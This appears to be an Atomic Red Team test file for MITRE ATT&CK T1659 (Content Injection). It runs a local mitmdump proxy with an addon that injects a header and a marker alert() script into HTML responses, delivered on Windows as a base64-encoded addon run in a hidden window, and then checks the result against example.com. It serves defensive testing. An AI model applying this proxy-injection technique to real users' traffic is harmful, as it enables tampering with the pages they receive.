53c52a2d58
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
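# Atomic test for MITRE ATT&CK T1659 (Content Injection).
# Both tests run a local mitmdump instance with a small addon that tags
# text/html responses with an X-Atomic header and appends a marker <script>
# before </body>; the executor then fetches http://example.com through the
# proxy and checks that both modifications are present.
#
# All artefact paths are fixed (/tmp/... and $env:TEMP\...) because
# prereq_command, command and cleanup_command run as separate shells and
# cannot share a mktemp result. On a shared host another local user could
# pre-create or symlink those names, so run this on a dedicated test machine.
attack_technique: T1659
display_name: Content Injection
atomic_tests:
- name: MITM Proxy Injection
  description: Start mitmdump and verify injected header and HTML content.
  supported_platforms:
  - macos
  - linux
  dependencies:
  - description: python3 must be installed
    prereq_command: |
      command -v python3
    get_prereq_command: |
      brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
  - description: curl must be installed
    prereq_command: |
      command -v curl
    get_prereq_command: |
      brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
  - description: pipx must be installed
    prereq_command: |
      pipx --version
    get_prereq_command: |
      brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
  # get_prereq_command may fall back to brew, so the check accepts either a
  # pipx-managed install or a mitmdump already on PATH.
  - description: mitmproxy must be installed
    prereq_command: |
      pipx list | grep mitmproxy || command -v mitmdump
    get_prereq_command: |
      pipx install mitmproxy || brew install mitmproxy
  - description: mitmdump must be running on port 8080
    prereq_command: |
      lsof -i tcp:8080 | grep mitmdump
    get_prereq_command: |
      # Addon: add X-Atomic to text/html responses and append a marker script
      # before </body>. The body of the 'if' must be indented deeper than the
      # 'if' line itself or Python rejects the file; 4/8 spaces matches the
      # Windows variant's addon.
      printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
      # Prefer mitmdump on PATH; fall back to pipx's default bin dir, which is
      # not on PATH after a fresh pipx install.
      MITMDUMP=$(command -v mitmdump || echo "$HOME/.local/bin/mitmdump")
      ("$MITMDUMP" -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
      sleep 5
      # { ...; } runs in the current shell, so 'exit 1' ends this script.
      lsof -i tcp:8080 | grep mitmdump || { cat /tmp/atomic_t1659.log; exit 1; }
  executor:
    name: bash
    command: |
      # HEAD request via the proxy: the addon should have added X-Atomic.
      # A failure here must end the script; a '( ...; exit 1 )' subshell would
      # only exit the subshell and the script would continue to the next step.
      curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
      grep "X-Atomic" /tmp/curl_out.txt || { cat /tmp/curl_out.txt; exit 1; }
      # Full body: the addon should have appended the marker before </body>.
      curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
      grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || { head -20 /tmp/atomic_t1659_page.html; exit 1; }
    cleanup_command: |
      # Plain files only; no recursion needed.
      rm -f /tmp/atomic_t1659_inject.py /tmp/atomic_t1659.log /tmp/curl_out.txt /tmp/atomic_t1659_page.html
      # Match the addon path so only the instance started by this test is
      # stopped, not every mitmdump on the host.
      pkill -f "mitmdump -s /tmp/atomic_t1659_inject.py" || true
- name: MITM Proxy Injection (Windows)
  description: Start mitmdump proxy with injection script in the background.
  supported_platforms:
  - windows
  dependencies:
  - description: Python must be installed
    prereq_command: |
      if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      winget install --id Python.Python.3 -e
  - description: curl must be installed
    prereq_command: |
      if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      winget install --id cURL.cURL -e
  - description: mitmproxy must be installed and in PATH
    prereq_command: |
      if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
    get_prereq_command: |
      python -m pip install mitmproxy
  # NOTE(review): the port check matches the owning process name against
  # "*mitmdump*"; if the pip console-script launcher hands the socket to a
  # child python.exe this check may not match - confirm on a test host.
  - description: mitmdump must be running on port 8080
    prereq_command: |
      if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
    get_prereq_command: |
      # $code is the base64 of the same addon used by the Linux test (double
      # quoted strings, 4/8-space indentation).
      $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
      [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
      # NOTE(review): Start-Process is understood to reject the same file for
      # -RedirectStandardOutput and -RedirectStandardError; stderr therefore
      # goes to a second log (atomic_t1659_err.log, introduced here), which is
      # harmless even where a shared file would have been accepted.
      Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659_err.log" -WindowStyle Hidden
      Start-Sleep -Seconds 5
      if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log", "$env:TEMP\atomic_t1659_err.log" -ErrorAction SilentlyContinue; exit 1 }
  executor:
    name: powershell
    elevation_required: false
    command: |
      # HEAD request via the proxy: the addon should have added X-Atomic.
      curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
      if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
      # Full body: the addon should have appended the marker before </body>.
      $OutPath = "$env:TEMP\atomic_t1659_page.html"
      curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
      $Content = Get-Content -Path $OutPath -Raw
      if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
    cleanup_command: |
      # Stops every process named mitmdump, not only the one started here.
      Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
      Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
      Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
      Remove-Item "$env:TEMP\atomic_t1659_err.log" -ErrorAction SilentlyContinue
      Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
      Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue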